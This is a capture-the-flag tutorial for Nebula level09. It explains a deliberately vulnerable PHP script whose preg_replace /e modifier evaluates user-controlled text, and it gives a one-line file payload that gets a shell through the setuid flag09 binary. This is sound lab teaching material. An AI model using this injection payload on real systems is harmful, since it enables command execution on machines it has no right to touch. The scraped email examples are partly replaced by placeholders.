#Exploit-Exercice : Nebula
##Level09 - PHP preg_replace
Hi everyone ! It’s been a long time since the last Tutorial 
Today, this tutorial will focus on a vulnerable php application.
Let’s begin !
The source code
Nebula provides us the php source code of the vulnerable app :
<?php
function spam($email)
{
$email = preg_replace("/\./", " dot ", $email);
$email = preg_replace("/@/", " AT ", $email);
return $email;
}
function markup($filename, $use_me)
{
$contents = file_get_contents($filename);
$contents = preg_replace("/(\[email (.*)\])/e", "spam(\"\\2\")", $contents);
$contents = preg_replace("/\[/", "<", $contents);
$contents = preg_replace("/\]/", ">", $contents);
return $contents;
}
$output = markup($argv[1], $argv[2]);
print $output;
?>
Let’s break the code into small piece
n.b : the flag09 binary located in the /home/flag09 will run the php script
Understanding preg_replace and php variable
How does it work ?
We have two function in this php code
spam and markup
Here is the spam function :
function spam($email)
{
$email = preg_replace("/\./", " dot ", $email);
$email = preg_replace("/@/", " AT ", $email);
return $email;
}
This function will simply replace the content of the $email variable
if the regex find a “.”, the function will replace “.” with “dot”
if the regex find a “@”, the function will replace “@” with “AT”
example : [email protected] will output : darlene AT fsociety dot com
Now let’s dive into the markup function :
function markup($filename, $use_me)
{
$contents = file_get_contents($filename);
$contents = preg_replace("/(\[email (.*)\])/e", "spam(\"\\2\")", $contents);
$contents = preg_replace("/\[/", "<", $contents);
$contents = preg_replace("/\]/", ">", $contents);
return $contents;
}
the function markup have two arguments : filename, useme
Forget the useme variable, we will pass garbage data : (ex: asdf, fsociety, unicorn) because this variable is not used
filename is the path to our file name as you can see in the first regex the function will search for a specific string
[email (.*)]
If a string looks like the regex in the preg_replace :
ex :
- [email [email protected]]
- [email [email protected]]
- [email [email protected]]
- [email [email protected]]
it will strip the string and execute the second part and pass it to spam
*ex:
- spam([email protected])
- spam([email protected])
- spam([email protected])
- spam( [email protected])
and the spam command will strip these emails
ex :
- darlene AT fsociety dot com
- elio tAT fsociety dot com
- tyrell AT e-corpdot com
- gideon AT allsafedot com
Exploiting preg_replace
Here is the problem of this piece of code :
$contents = preg_replace("/(\[email (.*)\])/e", "spam(\"\\2\")", $contents);
the /e will execute the second argument of the preg_replace function as a php expression
Let’s create our “hack file”
echo '[email {$filename}]' >/tmp/hack
Now when we run the flag09 binary the output will be :
/tmp/hack
Now let’s exploit it to get a shell
echo '[email {${system(sh)}]' >/tmp/hack
this will output the return value of the system function : A shell
The next tutorial will cover Race Condition exploit